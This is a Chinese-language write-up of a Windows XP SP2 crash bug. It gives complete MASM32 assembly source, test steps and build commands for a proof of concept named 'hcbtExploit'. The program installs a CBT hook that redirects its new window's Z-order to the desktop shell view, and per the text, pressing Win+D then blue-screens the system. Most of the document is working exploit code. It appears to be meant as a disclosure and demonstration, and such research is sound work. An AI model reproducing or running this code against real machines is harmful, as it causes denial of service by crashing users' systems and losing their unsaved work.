应用程序通过 hook 函数 CBTProc，并在 nCode 值为 HCBT_CREATEWND 时，让 hook 函数把 hWndInsertAfter 改成其它窗口的 hwnd。之后当用户按下 WindowsKey+D 最小化所有窗口时即可触发这个问题。
测试环境:
操作系统:WIN XP SP2
测试过程:
1、运行测试程序
2、按下WindowsKey+D
3、系统蓝屏
程序代码:
 
.386                                    ; Win32, flat 32-bit code
.model flat,stdcall                     ; all procs/imports use stdcall
option casemap:none                     ; case-sensitive symbols (required for Win32 import names)

include windows.inc
include user32.inc
include kernel32.inc
includelib user32.lib
includelib kernel32.lib

.data
; Window class name.  HookProc compares the class of every window created
; on this thread against this string and only acts on a match.
_wnd    db 'hcbtExploit',0

.data?
hhook   dd ?                            ; HHOOK from SetWindowsHookEx; passed to CallNextHookEx / UnhookWindowsHookEx
 -  
 WndProc proc hWnd:HWND,uMsg:UINT,wParam:WPARAM,lParam:LPARAM
        ;---------------------------------------------------------------
        ; LRESULT WndProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
        ; Window procedure for the _wnd class.  WM_DESTROY posts WM_QUIT
        ; (so the WinMain message loop terminates) and returns 0; every
        ; other message goes to DefWindowProc and its result is returned.
        ; ABI:   stdcall; ebx/esi/edi/ebp are not touched.
        ; Out:   eax = 0 for WM_DESTROY, else DefWindowProc's return value
        ;---------------------------------------------------------------
        .if uMsg != WM_DESTROY
            ; common case on the fall-through path
            invoke DefWindowProc,hWnd,uMsg,wParam,lParam
        .else
            invoke PostQuitMessage,0
            xor eax,eax                 ; message handled -> return 0
        .endif
        ret
 WndProc endp
 -  
 HookProc proc uses ebx nCode:UINT,wParam:WPARAM,lParam:LPARAM
        ;---------------------------------------------------------------
        ; LRESULT CALLBACK HookProc(int nCode, WPARAM wParam, LPARAM lParam)
        ; WH_CBT callback that WinMain installs for the current thread only.
        ; For HCBT_CREATEWND, wParam is the HWND being created and lParam
        ; points to a CBT_CREATEWND.  The hook reads the new window's class
        ; name and, when it is our own class (_wnd), replaces the
        ; hWndInsertAfter field of that CBT_CREATEWND with the handle found
        ; by GetDesktopWindow -> GW_CHILD -> GW_HWNDLAST -> GW_CHILD (the
        ; original comments label the last two steps Progman and
        ; SHELLDLL_DefView).  Per the test notes above, the system then
        ; blue-screens on WinKey+D (XP SP2); this is the defect the program
        ; demonstrates.
        ; Out:   eax = 0 (allow creation) on the HCBT_CREATEWND path,
        ;        otherwise the value returned by CallNextHookEx.
        ; Note:  the HCBT_CREATEWND path never calls CallNextHookEx, so any
        ;        later CBT hook on this thread is skipped for that event,
        ;        and none of the GetWindow results are NULL-checked: if a
        ;        step yields no window, 0 is stored in hWndInsertAfter.
        ; Clobb: eax, ecx, edx, flags; ebx is saved/restored by 'uses ebx'.
        ;---------------------------------------------------------------
        local buf[MAX_PATH]:BYTE        ; class name of the window being created
        .if nCode==HCBT_CREATEWND
            invoke GetClassName,wParam,addr buf,MAX_PATH   ; bounded to MAX_PATH bytes
            invoke lstrcmpi,addr buf,offset _wnd           ; case-insensitive compare
            .if eax==0                  ; class name matches ours
                mov ebx,lParam
                assume ebx:PTR CBT_CREATEWND
                ; each GetWindow below consumes the previous call's eax
                invoke GetDesktopWindow
                invoke GetWindow,eax,GW_CHILD       ; first child of the desktop
                invoke GetWindow,eax,GW_HWNDLAST    ; last window of that Z-order (author: Progman)
                invoke GetWindow,eax,GW_CHILD       ; its first child (author: SHELLDLL_DefView)
                mov [ebx].hWndInsertAfter,eax       ; override the new window's Z-order placement
                assume ebx:nothing
            .endif
            xor eax,eax                 ; 0 = let the window be created
        .else
            invoke CallNextHookEx,hhook,nCode,wParam,lParam   ; also covers nCode < 0
        .endif
        ret
 HookProc endp
 -  
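 WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
        ;---------------------------------------------------------------
        ; int WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR CmdLine, int CmdShow)
        ; Registers the _wnd window class, installs a WH_CBT hook for the
        ; *current thread only* (HookProc), creates the window -- which
        ; delivers HCBT_CREATEWND to the hook -- removes the hook again,
        ; shows the window and runs a standard message loop.
        ; Out:   eax = wParam of WM_QUIT on normal exit, or 1 if class
        ;        registration, window creation or GetMessage failed.
        ; Changes vs. the original listing: hbrBackground uses
        ; COLOR_WINDOW+1 (a COLOR_* index is only taken as a system brush
        ; when incremented by one), GetMessage's -1 error return no longer
        ; dispatches an uninitialised MSG, and failures of RegisterClassEx
        ; and CreateWindowEx exit cleanly (the hook is still removed).
        ;---------------------------------------------------------------
        local wc:WNDCLASSEX
        local msg:MSG
        local hwnd:HWND

        ; every WNDCLASSEX field is assigned explicitly below
        mov wc.cbSize,sizeof wc
        mov wc.style,CS_VREDRAW
        mov wc.lpfnWndProc,offset WndProc
        mov wc.cbClsExtra,0
        mov wc.cbWndExtra,0
        mov eax,hInst
        mov wc.hInstance,eax
        mov wc.hbrBackground,COLOR_WINDOW+1   ; system-colour brush index must be +1
        mov wc.lpszMenuName,0
        mov wc.lpszClassName,offset _wnd
        invoke LoadIcon,0,IDI_WARNING
        mov wc.hIcon,eax
        mov wc.hIconSm,eax
        invoke LoadCursor,0,IDC_CROSS
        mov wc.hCursor,eax
        invoke RegisterClassEx,addr wc
        .if eax == 0
            mov eax,1                   ; class registration failed: nothing to create
            ret
        .endif

        ; hMod = 0 and dwThreadId = this thread: the hook is local to this
        ; thread, so HookProc only ever sees windows created here.
        invoke GetCurrentThreadId
        invoke SetWindowsHookEx,WH_CBT,offset HookProc,0,eax
        mov hhook,eax                   ; may be 0 on failure; Unhook(0) then just fails

        invoke CreateWindowEx,\
            0,\
            offset _wnd,offset _wnd,\
            WS_OVERLAPPEDWINDOW,\
            400,250,600,400,0,0,hInst,0
        mov hwnd,eax

        ; the hook is only needed for this one HCBT_CREATEWND; remove it
        ; before checking the result so it never outlives window creation
        invoke UnhookWindowsHookEx,hhook

        .if hwnd == 0
            mov eax,1                   ; CreateWindowEx failed
            ret
        .endif

        invoke ShowWindow,hwnd,CmdShow
        invoke UpdateWindow,hwnd

        .while TRUE
            invoke GetMessage,addr msg,0,0,0
            .break .if (!eax)           ; 0 = WM_QUIT received
            .if eax == -1
                mov eax,1               ; GetMessage error: msg is not valid, do not dispatch it
                ret
            .endif
            invoke TranslateMessage,addr msg
            invoke DispatchMessage,addr msg
        .endw
        mov eax,msg.wParam              ; exit code passed to PostQuitMessage
        ret
 WinMain endp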
 -  
 start:
        ; Process entry point: hInstance = GetModuleHandle(0), then
        ; WinMain's return value becomes the process exit code.
        push 0
        call GetModuleHandle
        invoke WinMain,eax,0,0,SW_SHOWNORMAL
        push eax
        call ExitProcess                ; does not return
 end start
 
编译说明:
测试代码用 Win32 汇编编写，使用 MASM32 编译即可。Win32 汇编环境的搭建我之前已有介绍；环境搭建好后进入程序目录，使用 ml /c /coff hcbtExploit.asm 命令编译，然后用 link /subsystem:windows hcbtExploit.obj 链接，即可生成测试程序 hcbtExploit.exe。